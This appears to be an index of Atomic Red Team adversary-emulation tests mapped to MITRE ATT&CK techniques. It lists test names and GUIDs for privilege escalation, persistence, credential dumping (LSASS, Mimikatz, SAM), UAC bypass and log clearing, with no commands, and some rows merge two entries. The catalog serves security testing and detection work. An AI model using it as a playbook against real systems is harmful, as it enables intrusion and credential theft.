privilege-escalation T1548.001 Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
privilege-escalation T1548.001 Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
70 privilege-escalation T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
71 privilege-escalation T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
72 privilege-escalation T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
74 privilege-escalation T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
75 privilege-escalation T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
76 privilege-escalation T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
privilege-escalation T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
privilege-escalation T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
privilege-escalation T1053.006 Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
privilege-escalation T1053.006 Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
77 privilege-escalation T1134.001 Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
78 privilege-escalation T1134.001 Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
79 privilege-escalation T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
privilege-escalation T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
privilege-escalation T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
80 privilege-escalation T1546.003 Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
81 privilege-escalation T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
82 privilege-escalation T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
83 privilege-escalation T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
privilege-escalation T1543.003 Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
84 privilege-escalation T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
85 privilege-escalation T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
86 privilege-escalation T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
87 persistence T1546.004 .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
88 persistence T1546.004 .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
89 persistence T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
90 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
91 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
92 persistence T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
93 persistence T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
94 persistence T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
95 persistence T1546.011 Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
96 persistence T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
97 persistence T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
98 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
99 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
100 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
101 persistence T1197 BITS Jobs 4 Bits download using destktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
102 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
103 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
104 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
105 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
106 persistence T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
107 persistence T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
108 persistence T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
109 persistence T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
110 persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
111 persistence T1053.003 Cron 2 Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
112 persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
113 persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
114 persistence T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
115 persistence T1136.002 Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
116 persistence T1136.002 Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
117 persistence T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
118 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
119 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
120 persistence T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
121 persistence T1574.006 LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
122 persistence T1574.006 LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
123 persistence T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
124 persistence T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
125 persistence T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
126 persistence T1136.001 Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
127 persistence T1136.001 Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
128 persistence T1136.001 Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
129 persistence T1136.001 Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
130 persistence T1136.001 Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
131 persistence T1136.001 Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
132 persistence T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
133 persistence T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
134 persistence T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
135 persistence T1137.002 Office Test 1 Office Apllication Startup Test Persistence c3e35b58-fe1c-480b-b540-7600fb612563 command_prompt
136 persistence T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
137 persistence T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
138 persistence T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
139 persistence T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
140 persistence T1037.004 Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
141 persistence T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
142 persistence T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
143 persistence T1547.001 Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
144 persistence T1547.001 Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
145 persistence T1547.001 Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
146 persistence T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
147 persistence T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
148 persistence T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
149 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
150 persistence T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
151 persistence T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
152 persistence T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
153 persistence T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
154 persistence T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
155 persistence T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
156 persistence T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
157 persistence T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
158 persistence T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
159 persistence T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
160 persistence T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
161 persistence T1505.002 Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
162 persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
163 persistence T1505.003 Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
164 persistence T1546.003 Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
165 persistence T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
166 persistence T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
167 persistence T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
168 persistence T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
169 persistence T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
170 persistence T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
171 credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
172 credential-access T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
173 credential-access T1552.001 Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
174 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
175 credential-access T1552.001 Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
176 credential-access T1552.001 Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
177 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
178 credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
179 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
180 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
181 credential-access T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
182 credential-access T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
183 credential-access T1552.006 Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
184 credential-access T1552.006 Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
185 credential-access T1558.003 Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
186 credential-access T1555.001 Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
187 credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
188 credential-access T1003.004 LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
189 credential-access T1003.001 LSASS Memory 1 Windows Credential Editor 0f7c5301-6859-45ba-8b4d-1fac30fc31ed command_prompt
190 credential-access T1003.001 LSASS Memory 2 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
191 credential-access T1003.001 LSASS Memory 3 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
192 credential-access T1003.001 LSASS Memory 4 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
193 credential-access T1003.001 LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
194 credential-access T1003.001 LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
195 credential-access T1003.001 LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
196 credential-access T1003.003 NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
197 credential-access T1003.003 NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
198 credential-access T1003.003 NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
199 credential-access T1003.003 NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
200 credential-access T1003.003 NTDS 5 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
201 credential-access T1003.003 NTDS 6 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
202 credential-access T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
203 credential-access T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
204 credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
205 credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
206 credential-access T1003 OS Credential Dumping 1 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
207 credential-access T1003 OS Credential Dumping 2 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
208 credential-access T1003 OS Credential Dumping 3 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
209 credential-access T1110.002 Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
210 credential-access T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
211 credential-access T1110.001 Password Guessing 1 Brute Force Credentials 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
212 credential-access T1110.003 Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
213 credential-access T1110.003 Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
214 credential-access T1552.004 Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
215 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
216 credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
217 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
218 credential-access T1003.002 Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
219 credential-access T1003.002 Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
220 credential-access T1003.002 Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
221 credential-access T1003.002 Security Account Manager 4 PowerDump Registry dump of SAM for hashes and usernames 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
222 defense-evasion T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
223 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
224 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
225 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
226 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) Bits download using destktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
227 defense-evasion T1027.001 Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
228 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
229 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
230 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
231 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
232 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
233 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
234 defense-evasion T1548.002 Bypass User Account Control Bypass User Access Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
defense-evasion T1548.002 Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
defense-evasion T1548.002 Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
defense-evasion T1548.002 Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
defense-evasion T1548.002 Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
defense-evasion T1548.002 Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
defense-evasion T1548.002 Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
defense-evasion T1548.002 Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
defense-evasion T1548.002 Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
defense-evasion T1548.002 Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
defense-evasion T1548.002 Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
235 defense-evasion T1218.003 CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
236 defense-evasion T1218.003 CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
237 defense-evasion T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
245 defense-evasion T1070.003 Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
246 defense-evasion T1070.003 Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
247 defense-evasion T1070.003 Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
248 defense-evasion T1070.003 Clear Command History 9 Disable Bash History Logging with SSH -T Prevent Powershell History Logging 5f8abd62-f615-43c5-b6be-f780f25790a1 2f898b81-3e97-4abb-bc3f-a95138988370 sh powershell
249 defense-evasion T1070.003 Clear Command History 10 Prevent Powershell History Logging Clear Powershell History by Deleting History File 2f898b81-3e97-4abb-bc3f-a95138988370 da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
defense-evasion T1070.003 Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
250 defense-evasion T1070.002 Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
251 defense-evasion T1070.002 Clear Linux or Mac System Logs 2 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
252 defense-evasion T1070.002 Clear Linux or Mac System Logs 3 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
253 defense-evasion T1070.001 Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
254 defense-evasion T1070.001 Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
defense-evasion T1070.001 Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
defense-evasion T1078.004 Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e gcloud
255 defense-evasion T1027.004 Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
256 defense-evasion T1027.004 Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
defense-evasion T1027.004 Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
defense-evasion T1027.004 Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
defense-evasion T1027.004 Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
257 defense-evasion T1218.001 Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
258 defense-evasion T1218.001 Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
259 defense-evasion T1218.001 Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
262 defense-evasion T1218.001 Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
263 defense-evasion T1218.001 Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
264 defense-evasion T1218.002 Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
265 defense-evasion T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
266 defense-evasion T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
267 defense-evasion T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
defense-evasion T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
268 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
269 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
